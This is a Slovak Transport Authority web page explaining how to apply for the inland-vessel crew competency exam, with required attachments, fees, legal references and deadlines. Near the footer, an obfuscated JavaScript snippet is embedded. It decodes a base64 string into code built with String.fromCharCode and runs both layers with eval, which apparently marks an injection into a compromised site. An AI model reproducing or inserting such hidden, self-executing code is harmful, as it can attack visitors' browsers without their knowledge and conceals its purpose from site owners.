DOPRAVNÝ ÚRAD

Náležitosti potrebné pre vykonanie skúšky odbornej spôsobilosti člena posádky plavidla

Žiadosť o vykonanie skúšky odbornej spôsobilosti („Žiadosť o vykonanie alebo rozšírenie skúšky odbornej spôsobilosti člena posádky plavidla“) podáva uchádzač v predpísanom termíne na riadne vyplnenom tlačive Dopravného úradu (ďalej len „DÚ“).

Žiadosť je možné zaslať na poštovú adresu: Dopravný úrad, Letisko M. R. Štefánika, 823 05 Bratislava, alebo podať osobne v podateľni Dopravného úradu na Prístavnej 10 v Bratislave.

Prílohy k žiadosti:

  • výpis z registra trestov nie starší ako 3 mesiace,
  • overená fotokópia dokladu o najvyššom stupni ukončeného vzdelania,
  • lekársky posudok nie starší ako 3 mesiace a čestné prehlásenie vydané podľa výnosu MDPT SR č. 4052/2010/SCLVD/z. 08639-M o minimálnych požiadavkách na zdravotnú spôsobilosť člena posádky plavidla a vodcu malého plavidla, ktorým sa vykonáva ustanovenie § 31a zákona NR SR č. 338/2000 Z. z. o vnútrozemskej plavbe v znení neskorších predpisov,
  • udelenie výnimky zo vzdelania od DÚ(v prípade ak žiadateľ nespĺňa podmienku minimálne požadovaného vzdelania),
  • fotokópia preukazu odbornej spôsobilosti  (pri rozšírení odbornej spôsobilosti),
  • potvrdenie o plavebnej praxi (lodnícka knižka alebo potvrdenie od zamestnávateľa),
  • doklad o uhradení správneho poplatku.

V zmysle zákona NR SR č. 145/1995 Z. z. o správnych poplatkoch v znení neskorších predpisov je:

  • vykonanie skúšky odbornej spôsobilosti odbornej spôsobilosti člena posádky plavidla alebo vedúceho plavby na plavebnej komore spoplatnené správnym poplatkom vo výške 165,50 €,
  • vykonanie opravnej skúšky spoplatnené správnym poplatkom vo výške 82,50 €,
  • vydanie preukazu odbornej spôsobilosti spoplatnené správnym poplatkom vo výške 9,50 €.

Informácie o platení správnych poplatkov sú uvedené na tejto stránke. Správne poplatky sú splatné pri podaní žiadosti o vykonanie skúšky odbornej spôsobilosti, resp. pri podaní žiadosti o vydanie preukazu odbornej spôsobilosti v zmysle § 8 zákona NR SR. č. 145/95 Z. z. o správnych poplatkoch v znení neskorších predpisov.

Podľa § 18 ods. (1) Vyhlášky 12/2005 Z. z. ktorou sa ustanovujú podrobnosti o kvalifikačných predpokladoch, o overovaní odbornej spôsobilosti člena posádky plavidla a vodcu malého plavidla a vzory preukazov odbornej spôsobilosti členov posádky plavidla je žiadateľ povinný podať žiadosť o vykonanie skúšky najneskôr štyri týždne pred vyhláseným termínom skúšky určeným Dopravným úradom.

Vybavuje:
Mgr. Elvíra Fabiánová
Odbor plavebnej bezpečnosti vodných ciest a prístavov
Lodné posádky

var NVOUJMJOTF = atob(‘dmFyIEhUUVhOSkNQTFUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTI3IC0gOSwgMTAwIC0gMywgMTIzIC0gOSwgMzUgLSAzLCAxMTMgLSA2LCAxMDggLSA3LCAxMjcgLSA2LCA0MCAtIDgsIDY1IC0gNCwgMzYgLSA0LCA0MCAtIDEsIDg4IC0gMSwgMTE1IC0gMywgODYgLSA2LCA5NCAtIDcsIDkyIC0gOSwgMTI1IC0gOSwgMTI1IC0gNSwgODcgLSA2LCAxMTQgLSAyLCA5MyAtIDksIDQzIC0gNCwgNjggLSA5LCAxMyAtIDMsIDEyMCAtIDIsIDEwMCAtIDMsIDEyMiAtIDgsIDM2IC0gNCwgMTA4IC0gNywgMTE3IC0gNywgMTAyIC0gMywgMTA4IC0gNywgMTA3IC0gNywgMzQgLSAyLCA2MiAtIDEsIDQwIC0gOCwgNDggLSA5LCA3NSAtIDIsIDgzIC0gMSwgNzQgLSA1LCAxMTEgLSA2LCAxMDYgLSA2LCAxMjIgLSAxLCA4NiAtIDksIDgwIC0gOSwgNzcgLSA1LCAxMTMgLSA3LCA1NiAtIDcsIDgzIC0gMiwgMTAyIC0gNSwgOTMgLSA1LCAxMDMgLSA0LCA4NiAtIDEsIDgxIC0gMSwgMTI1IC0gMywgODIgLSAxLCAxMTUgLSA2LCA3NiAtIDUsIDgzIC0gMSwgNTAgLSAyLCA0OSAtIDIsIDY4IC0gMiwgNzggLSA2LCAxMTMgLSAyLCA1MCAtIDIsIDcyIC0gNywgMTEzIC0gNywgOTAgLSA1LCA1MSAtIDEsIDgxIC0gNywgMTIxIC0gMSwgNzggLSA5LCA1OSAtIDIsIDgzIC0gMywgODkgLSA3LCA5MCAtIDUsIDU5IC0gNiwgODUgLSA4LCAxMDcgLSAzLCA1NyAtIDUsIDExMiAtIDUsIDEwNSAtIDMsIDYwIC0gOSwgODkgLSA4LCA3NyAtIDUsIDc5IC0gOCwgMTIzIC0gMiwgODUgLSA4LCA5NiAtIDYsIDgzIC0gOSwgNzYgLSA5LCA4MyAtIDUsIDg5IC0gMSwgMTA2IC0gNSwgOTUgLSA4LCAxMjIgLSAyLCA5MSAtIDEsIDc0IC0gOCwgNzMgLSA4LCAxMjAgLSA5LCA1OSAtIDgsIDc0IC0gMiwgODEgLSA5LCAxMTQgLSAzLCAxMTMgLSA2LCA3NiAtIDYsIDkxIC0gOCwgODggLSA3LCA5MSAtIDQsIDc1IC0gMSwgMTI2IC0gNywgNjggLSAzLCA4MCAtIDUsIDgzIC0gNCwgNzIgLSA2LCA3NCAtIDEsIDEwNSAtIDEsIDc3IC0gNCwgMTI4IC0gOCwgODkgLSAzLCA1OCAtIDYsIDEwMCAtIDEsIDc1IC0gOCwgNzEgLSA2LCA3NSAtIDQsIDgwIC0gOSwgNTggLSA3LCA5MSAtIDEsIDEwNyAtIDgsIDEwNyAtIDgsIDEzMCAtIDgsIDYxIC0gNSwgNzAgLSAxLCA3NyAtIDMsIDcxIC0gNCwgMTAxIC0gMSwgMTIwIC0gOCwgODkgLSAyLCA1MCAtIDEsIDEwMyAtIDQsIDExMiAtIDQsIDcyIC0gNywgMTEzIC0gNywgOTAgLSA1LCAxMjkgLSA5LCA3MyAtIDMsIDEwNyAtIDEsIDExMCAtIDMsIDU2IC0gOCwgODAgLSAzLCAxMDUgLSAyLCA5MCAtIDksIDgzIC0gMSwgMTA1IC0gMywgMTIzIC0gMywgNTkgLSA3LCA1MyAtIDEsIDEwNiAtIDUsIDcyIC0gNywgODAgLSAzLCAxMTMgLSA2LCA4NyAtIDksIDEwNyAtIDIsIDEwMCAtIDEsIDEwOCAtIDgsIDgwIC0gOSwgNTQgLSAzLCA2MCAtIDgsIDEwNCAtIDQsIDgzIC0gNSwgOTEgLSA3LCA1OCAtIDYsIDEwNyAtIDYsIDEwOCAtIDYsIDExMyAtIDcsIDQ5IC0gMSwgMTEyIC0gOSwgODcgLSAyLCA1MCAtIDEsIDcyIC0gMiwgMTE5IC0gNiwgMTA3IC0gNiwgMTE0IC0gOCwgNzIgLSA3LCA1NCAtIDIsIDc1IC0gNiwgMTI0IC0gMywgOTEgLSA2LCA1NiAtIDIsIDg1IC0gNywgMTA3IC0gMywgMTE3IC0gNiwgODIgLSA1LCAxMDMgLSAxLCAxMjcgLSA3LCAxMDggLSA1LCAxMjUgLSA1LCA4NCAtIDYsIDEwOCAtIDQsIDg1IC0gMywgNDkgLSA2LCA4MyAtIDUsIDExMSAtIDYsIDc4IC0gMSwgNzQgLSA1LCA3OSAtIDcsIDkyIC0gOCwgNTcgLSAxLCA4OSAtIDQsIDcyIC0gMiwgMTMwIC0gOCwgNjIgLSA2LCA5MSAtIDEsIDg3IC0gNywgNzYgLSA4LCA4MiAtIDQsIDY0IC0gOSwgNzIgLSA2LCA3NCAtIDksIDEyMCAtIDksIDU1IC0gNCwgODAgLSA4LCA4MCAtIDgsIDUyIC0gMywgMTIwIC0gNSwgMTEwIC0gOSwgMTEwIC0gNywgNjQgLSAzLCA2NCAtIDMsIDQzIC0gNCwgNjQgLSA1LCAxNyAtIDcsIDExMSAtIDksIDEyMCAtIDMsIDExOSAtIDksIDEwOCAtIDksIDEyMCAtIDQsIDEwOCAtIDMsIDExNiAtIDUsIDExOCAtIDgsIDM4IC0gNiwgMTIzIC0gMywgMTE3IC0gNiwgMTE5IC0gNSwgMTAyIC0gNywgMTA0IC0gMywgMTE0IC0gNCwgMTA1IC0gNiwgNDcgLSA3LCAxMTkgLSA0LCAxMTggLSAyLCAxMjEgLSA3LCAxMDkgLSA0LCAxMTUgLSA1LCAxMTEgLSA4LCA0NyAtIDMsIDM2IC0gNCwgMTExIC0gNCwgMTAyIC0gMSwgMTI2IC0gNSwgNDcgLSA2LCAzOCAtIDYsIDEzMCAtIDcsIDE3IC0gNywgMzkgLSA3LCAzNCAtIDIsIDEyNCAtIDYsIDEwMiAtIDUsIDExOCAtIDQsIDM4IC0gNiwgMTIxIC0gNywgMTA5IC0gOCwgMTE2IC0gMSwgMzggLSA2LCA2NCAtIDMsIDM2IC0gNCwgNDMgLSA0LCA0OCAtIDksIDYwIC0gMSwgMTggLSA4LCAzNiAtIDQsIDMzIC0gMSwgMTAzIC0gMSwgMTE1IC0gNCwgMTE3IC0gMywgNDAgLSA4LCA0NiAtIDYsIDExOSAtIDEsIDEwMiAtIDUsIDEyMiAtIDgsIDM3IC0gNSwgMTA4IC0gMywgNDEgLSA5LCA2NyAtIDYsIDM4IC0gNiwgNTEgLSAzLCA2NSAtIDYsIDMzIC0gMSwgMTExIC0gNiwgMzMgLSAxLCA2MyAtIDMsIDM5IC0gNywgMTE2IC0gMSwgMTIyIC0gNiwgMTIyIC0gOCwgMTA5IC0gNCwgMTEyIC0gMiwgMTA0IC0gMSwgNDggLSAyLCAxMTEgLSAzLCAxMDIgLSAxLCAxMTYgLSA2LCAxMDkgLSA2LCAxMjUgLSA5LCAxMTAgLSA2LCA2OCAtIDksIDM5IC0gNywgMTEwIC0gNSwgNTEgLSA4LCA0NyAtIDQsIDQzIC0gMiwgMzYgLSA0LCAxMjcgLSA0LCAxMyAtIDMsIDMzIC0gMSwgMzcgLSA1LCAzOCAtIDYsIDM2IC0gNCwgMTE2IC0gMiwgMTA1IC0gNCwgMTE2IC0gMSwgNDEgLSA5LCA0NyAtIDQsIDYyIC0gMSwgMzggLSA2LCA4NSAtIDIsIDEyMCAtIDQsIDExOCAtIDQsIDExMiAtIDcsIDExNSAtIDUsIDEwNCAtIDEsIDQ4IC0gMiwgMTA1IC0gMywgMTE2IC0gMiwgMTIwIC0gOSwgMTE4IC0gOSwgNjkgLSAyLCAxMTIgLSA4LCAxMDIgLSA1LCAxMTkgLSA1LCA2OCAtIDEsIDExMiAtIDEsIDEwOCAtIDgsIDEwNCAtIDMsIDQ4IC0gOCwgMTIxIC0gNiwgMTE4IC0gMiwgMTE4IC0gNCwgMTA4IC0gMywgMTEyIC0gMiwgMTEwIC0gNywgNDkgLSAzLCAxMDQgLSA1LCAxMDcgLSAzLCAxMDUgLSA4LCAxMTcgLSAzLCA3NCAtIDcsIDExNyAtIDYsIDEwMyAtIDMsIDEwOCAtIDcsIDY2IC0gMSwgMTIyIC0gNiwgNDcgLSA3LCAxMDYgLSAxLCA0NSAtIDQsIDQwIC0gOCwgMTAwIC0gNiwgMTkgLSA5LCAxNSAtIDYsIDEwIC0gMSwgMTAgLSAxLCAxMCAtIDEsIDExMSAtIDQsIDExMCAtIDksIDEyNyAtIDYsIDQ4IC0gMiwgMTAzIC0gNCwgMTA3IC0gMywgOTkgLSAyLCAxMTggLSA0LCA2OSAtIDIsIDExMyAtIDIsIDEwOCAtIDgsIDEwOCAtIDcsIDczIC0gOCwgMTIwIC0gNCwgNDMgLSAzLCAxMTIgLSA3LCAzOCAtIDYsIDQ1IC0gOCwgMzYgLSA0LCAxMTEgLSA0LCAxMDUgLSA0LCAxMjcgLSA2LCA0OSAtIDMsIDExMiAtIDQsIDEwNyAtIDYsIDExMyAtIDMsIDEwNCAtIDEsIDExOSAtIDMsIDEwOCAtIDQsIDQyIC0gMSwgNDggLSA3LCA2MCAtIDEsIDE4IC0gOCwgMzUgLSAzLCAzNSAtIDMsIDEzMyAtIDgsIDE4IC0gOCwgMzUgLSAzLCAzOSAtIDcsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDUsIDExOCAtIDEsIDEyMyAtIDksIDExMyAtIDMsIDM3IC0gNSwgMTIwIC0gNiwgMTA1IC0gNCwgMTIyIC0gNywgNjggLSA5LCAxMiAtIDIsIDEzNCAtIDksIDExIC0gMSwgMTUgLSA1LCAxMjcgLSA5LCA5OCAtIDEsIDExOSAtIDUsIDM2IC0gNCwgMTA4IC0gOCwgMTA1IC0gNCwgMTA2IC0gNywgNDAgLSA4LCA2NCAtIDMsIDM1IC0gMywgMTI5IC0gOSwgMTE2IC0gNSwgMTE1IC0gMSwgOTYgLSAxLCAxMDUgLSA0LCAxMTggLSA4LCAxMDQgLSA1LCA0NCAtIDQsIDEwNCAtIDcsIDExOSAtIDMsIDExNCAtIDMsIDk5IC0gMSwgNDEgLSAxLCAxMDUgLSA0LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDMgLSAyLCAxMDkgLSA5LCA0NSAtIDQsIDUzIC0gOSwgMzggLSA2LCAxMTIgLSA1LCAxMDcgLSA2LCAxMjIgLSAxLCA0NSAtIDQsIDYyIC0gMywgMTcgLSA3LCA0NyAtIDcsIDExNCAtIDQsIDEwNCAtIDMsIDEyMiAtIDMsIDM0IC0gMiwgNzkgLSA5LCAxMTkgLSAyLCAxMTkgLSA5LCAxMDcgLSA4LCAxMjAgLSA0LCAxMTIgLSA3LCAxMTMgLSAyLCAxMTIgLSAyLCA0MyAtIDMsIDEwNCAtIDQsIDEwNCAtIDMsIDEwNCAtIDUsIDQ3IC0gNiwgNDkgLSA4LCA0MyAtIDMsIDQ2IC0gNSwgNjAgLSAxLCAxOSAtIDksIDE0IC0gNCk7ZXZhbChIVFFYTkpDUExVKTs=’);
eval(NVOUJMJOTF);

© Dopravný úrad / Transport Authority | Mapa stránok | RSS W3C Validation

Dodávateľ portálového riešenia